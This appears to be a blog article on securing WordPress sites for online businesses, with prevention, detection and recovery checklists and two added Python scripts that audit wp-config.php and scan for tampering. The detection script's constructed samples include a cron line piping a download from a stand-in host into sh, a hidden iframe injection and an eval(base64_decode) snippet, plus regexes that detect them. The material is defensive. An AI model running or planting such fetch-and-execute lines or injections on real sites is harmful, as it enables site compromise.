We keep hearing about data hacks and leaks nearly every day. Such news usually makes us wonder whether anything is safe online at all.
These breaches are usually bad news for businesses that depend wholly on the internet, as many of their customers postpone their online purchases until they recover from news that is frankly quite shocking to them.
Most online shoppers are very worried about their online privacy and payment security, and if they lose trust in a website they tend to avoid it for a long time, which is very bad for the business.
A lot of businesses are advised to move their websites onto newer and more complex platforms as a remedy, with the promise that this will prevent hacking attempts and reduce malware attacks.
Most small businesses and professionals cannot afford these high-end and costly third-party applications and prefer free but reliable platforms such as Magento, WordPress and other open-source/free-to-use platforms.
However, being open source, these platforms usually carry a lot of user-generated content and hence a higher risk.
WordPress has been around for quite a while now and is loved for its ease of use and high customizability. There are a lot of e-commerce applications built as plugins for WordPress to run online businesses, and they are used by millions of users around the world. However, we have also been hearing how WordPress is very unsafe for e-commerce applications and even for other activities, and how everyone should start opting for more ‘closed’ third-party platforms to be ‘secure’.
Millions and millions of websites and blogs are powered by WordPress, more than by any other such platform, and this is why we hear more bad news about WordPress sites, not because it is a poor platform.
Most users choose WordPress because it is free, very user friendly, highly customizable and scalable. The fact that hundreds of thousands of techies are constantly adding new features every day through ‘plugins’, which can simply be installed and used by all WordPress users alike, makes it a wonderful platform for most users.
This crowd/community support environment is what makes WordPress one of the most loved platforms on the internet.
The features and customization provided by this humble ‘CMS’ are simply astounding, and hence it is loved by people young and old, techies and non-techies alike, around the globe. Some of the notable users are mentioned below.
Looking at the above list, many of you might wonder: if WordPress is as insecure as many would have us believe, how come some of the most influential and largest organizations use it?
The answer is very simple: they take precautions and steps to make their WordPress secure and prevent mishaps.
Nothing in the world is foolproof, and even less so on the Internet. No software, application or website can be 100% secure, and hence neither is WordPress, but there are some simple steps that can be taken to prevent the more common intrusions.
The process of making any online property secure is as follows:
1) Prevention: The first and logical step is to prevent an attack by hiding from and delaying the attacker, so that the attack becomes less worthwhile for them. In WordPress you can do this by:
# Changing the default login URL: helps deter automated brute-force attacks.
# Changing the default DB table prefix: helps against SQL injection attacks that assume the default ‘wp_’ table names.
# Removing the WordPress version from the page meta tags helps too, as it stops attackers from easily picking the known vulnerabilities of that particular version.
# Changing the default username (most people still use ‘admin’ as the user name).
# Blacklisting IPs after multiple failed login attempts, and
# Whitelisting an IP for admin login.
# Very important: use a combination of special characters, upper- and lower-case letters and numbers for passwords and usernames.
# Use CAPTCHA for forms, comments and logins.
# Do not give write/edit access to unknown or unverified users.
# Prevent file overwrites by removing write access once the approved editing has been done, for example on the .htaccess and wp-config.php files.
# Plugins and themes are the heart and soul of WordPress; however, do not install plugins or themes from unverified or suspicious sources, as they are one of the biggest sources of malware and provide hidden doors for attackers.
# Make a habit of changing the passwords of your cPanel and dashboard every 3-6 months.
# Use the SFTP protocol rather than plain FTP to access the files on your domain.
# Keep your PC/Mac and browsers free from malware, malicious toolbars and other harmful software.
# Use trusted, encrypted payment gateways and never allow the payment process to move to an unencrypted space or page.
# Keep your WordPress version and plugins up to date.
# Use a trusted, reputable and secure hosting provider with good after-sales customer support and integrated tech support to help you out in case of trouble.
# Store backups of important files such as .htaccess and wp-config.php so that they can be compared for changes and restored in case of error.
# Periodically back up your database so it can be restored in case of loss during an attack.
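Several of the items above (the default ‘wp_’ table prefix, strong passwords, no editing access once configuration is done) can be checked mechanically. The script below is an added example written for this page, not code from the original post or from the WordPress project. It audits a wp-config.php against those points and flags over-permissive file modes; the two sample configurations are constructed for illustration, and DISALLOW_FILE_EDIT and FORCE_SSL_ADMIN are real WordPress constants that the post itself does not name.

```python
"""Audit a wp-config.php against the prevention checklist (added example).

Checks: default 'wp_' table prefix, weak DB password, dashboard file editor
left enabled (DISALLOW_FILE_EDIT), admin traffic not forced onto HTTPS
(FORCE_SSL_ADMIN), debug output left on, and over-permissive file modes.
Sample configurations below are constructed, not taken from any real site.
"""
import os
import re
import stat

# Constructed sample: a fresh install with the defaults still in place.
WEAK_CONFIG = """<?php
define( 'DB_NAME', 'shopdb' );
define( 'DB_USER', 'shopuser' );
define( 'DB_PASSWORD', 'password' );
$table_prefix = 'wp_';
define( 'WP_DEBUG', true );
"""

# Constructed sample: the same file after applying the checklist.
HARDENED_CONFIG = """<?php
define( 'DB_NAME', 'shopdb' );
define( 'DB_USER', 'shopuser' );
define( 'DB_PASSWORD', 'v7#Qx!2pLm9@zR4e' );
$table_prefix = 'k3x9_';
define( 'WP_DEBUG', false );
define( 'DISALLOW_FILE_EDIT', true );
define( 'FORCE_SSL_ADMIN', true );
"""


def php_define(text, name):
    """Source text of the value in define('NAME', value); or None if absent."""
    m = re.search(r"define\(\s*['\"]" + re.escape(name) + r"['\"]\s*,\s*(.+?)\s*\)\s*;", text)
    return m.group(1) if m else None


def table_prefix(text):
    """The $table_prefix value, or None if the line is missing."""
    m = re.search(r"\$table_prefix\s*=\s*['\"]([^'\"]*)['\"]", text)
    return m.group(1) if m else None


def strong_enough(secret, min_len=12):
    """Mixed-case letters, digits and special characters, as the checklist asks."""
    return len(secret) >= min_len and all(
        re.search(p, secret) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))


def audit_wp_config(text):
    """Return human-readable findings; an empty list means every check passed."""
    findings = []
    if table_prefix(text) in (None, "wp_"):
        findings.append("table prefix is the default 'wp_'")
    pw = php_define(text, "DB_PASSWORD")
    if pw is None or not strong_enough(pw.strip("'\"")):
        findings.append("DB_PASSWORD missing or does not mix cases, digits and specials")
    if php_define(text, "DISALLOW_FILE_EDIT") != "true":
        findings.append("DISALLOW_FILE_EDIT not true: theme/plugin editor usable from the dashboard")
    if php_define(text, "FORCE_SSL_ADMIN") != "true":
        findings.append("FORCE_SSL_ADMIN not true: admin logins may be sent over plain HTTP")
    if php_define(text, "WP_DEBUG") == "true":
        findings.append("WP_DEBUG is on: error output can reveal paths and versions")
    return findings


def audit_mode(mode, max_mode=0o640):
    """Flag permission bits beyond max_mode (e.g. a world-readable wp-config.php)."""
    bits = stat.S_IMODE(mode)
    if bits & ~max_mode:
        return ["file mode %o exceeds %o" % (bits, max_mode)]
    return []


def audit_file(path):
    """Run both checks against a real wp-config.php on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        findings = audit_wp_config(fh.read())
    return findings + audit_mode(os.stat(path).st_mode)


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_wp_config(cfg) or ["no findings"])
    print(audit_mode(0o644))  # typical default mode, too open for a secrets file
```

Run it against a real install with `audit_file("/path/to/wp-config.php")`; the permission threshold of 0640 is an assumption that suits a setup where the web server runs as the file's group, so adjust `max_mode` to match your host.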
2) Timely detection: If an attack does happen, the next best thing is to detect it early, isolate it and prevent any further damage:
# Look for signs such as unusually slow page load times.
# Strange and previously unseen code appearing on the web pages.
# Garbled text in the web pages.
# Use a sitemap monitor to check for any new pages being created without your consent.
# Perform periodic checks for any unauthorized changes to important files such as .htaccess, wp-config.php etc.
# Check the cron jobs on your server for any unauthorized or suspicious scheduled tasks.
# Keep a watch on webmaster tools for any spike in bot traffic or malware warnings.
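Three of the detection points above (unauthorized changes to .htaccess and wp-config.php, strange code on the pages, suspicious cron jobs) lend themselves to a small monitoring script. The one below is an added example written for this page, not code from the original post or from WordPress: it keeps a SHA-256 baseline of the critical files and diffs it later, scans a rendered page for a leaked version meta tag, obfuscated code and hidden iframes, and flags cron lines that pipe downloaded content into a shell. The file contents, page HTML and crontab are constructed samples, and the signature list is deliberately short; treat it as a starting point rather than a complete scanner.

```python
"""Detection helpers for a WordPress install (added example).

  1. hash baseline of critical files and a later diff against it,
  2. scan of rendered HTML for tell-tale signs,
  3. crontab lines that fetch and execute remote content.
All sample data below is constructed for illustration.
"""
import hashlib
import re
from pathlib import Path

CRITICAL_FILES = ("wp-config.php", ".htaccess", "index.php")


def hash_contents(files):
    """{name: bytes} -> {name: sha256 hex}; used for the baseline and each re-check."""
    return {name: hashlib.sha256(data).hexdigest() for name, data in files.items()}


def read_critical(root, names=CRITICAL_FILES):
    """Read the critical files that exist under an install root into {name: bytes}."""
    root = Path(root)
    return {n: (root / n).read_bytes() for n in names if (root / n).is_file()}


def diff_baseline(baseline, current):
    """Compare two hash maps; returns {name: 'modified' | 'missing' | 'new'}."""
    changes = {}
    for name, digest in baseline.items():
        if name not in current:
            changes[name] = "missing"
        elif current[name] != digest:
            changes[name] = "modified"
    for name in current:
        if name not in baseline:
            changes[name] = "new"
    return changes


# Signs of trouble in a rendered page; each label names what the regex detects.
PAGE_SIGNS = {
    "version disclosed in meta generator": re.compile(
        r'<meta\s+name="generator"\s+content="WordPress\s+[\d.]+"', re.I),
    "obfuscated code (eval of decoded payload)": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "hidden iframe": re.compile(
        r"<iframe\b[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)=[\"']?0\b)",
        re.I),
}


def scan_page(html):
    """Return the label of every sign found in the page."""
    return [label for label, rx in PAGE_SIGNS.items() if rx.search(html)]


# A download piped straight into a shell is not something a legitimate job does.
CRON_SIGN = re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b", re.I)


def suspicious_cron_lines(crontab_text):
    """Non-comment cron entries that match CRON_SIGN."""
    return [line for line in crontab_text.splitlines()
            if line.strip() and not line.lstrip().startswith("#") and CRON_SIGN.search(line)]


# --- constructed samples -------------------------------------------------
CLEAN_FILES = {
    "wp-config.php": b"<?php\n$table_prefix = 'k3x9_';\n",
    ".htaccess": b"RewriteEngine On\n",
}
TAMPERED_FILES = {
    "wp-config.php": b"<?php\n$table_prefix = 'k3x9_';\n",
    ".htaccess": b"RewriteEngine On\nRewriteRule . /evil.php [L]\n",  # altered
    "wp-load2.php": b"<?php echo 'x';",  # unexpected new file
}
CLEAN_PAGE = "<html><head><title>Shop</title></head><body>Welcome</body></html>"
INFECTED_PAGE = ('<html><head><meta name="generator" content="WordPress 4.1" /></head>'
                 '<body><iframe src="http://example.invalid/x" style="display:none"></iframe>'
                 '<?php eval(base64_decode("aGVsbG8=")); ?></body></html>')
CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/bin/php /var/www/html/wp-cron.php
*/10 * * * * curl -s http://example.invalid/u.txt | sh
"""

if __name__ == "__main__":
    print(diff_baseline(hash_contents(CLEAN_FILES), hash_contents(TAMPERED_FILES)))
    print(scan_page(INFECTED_PAGE))
    print(suspicious_cron_lines(CRONTAB))
```

In practice, store the baseline from `hash_contents(read_critical(root))` somewhere the web server cannot write (off the host is best, since an attacker who can change wp-config.php can usually change a baseline kept next to it) and run the diff from cron or your monitoring system.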
3) Recovery: After you have found and located the attack, the next step is to isolate it and restore normal operations:
# Clean all installation files and the host/server of any infection, and then check the backups for infections as well.
# Remove all the vulnerabilities that allowed the attack; then, once the server and installation have been cleaned, use the backups to restore your files and DB and get the site live again.
Note: Always take the site down once an attack has been detected, so as to prevent it spreading to visitors. Stop all emails, newsletters, commenting etc. and display a message informing everyone of the current situation if you still have access to the site. Otherwise, ask your hosting provider to take the site down.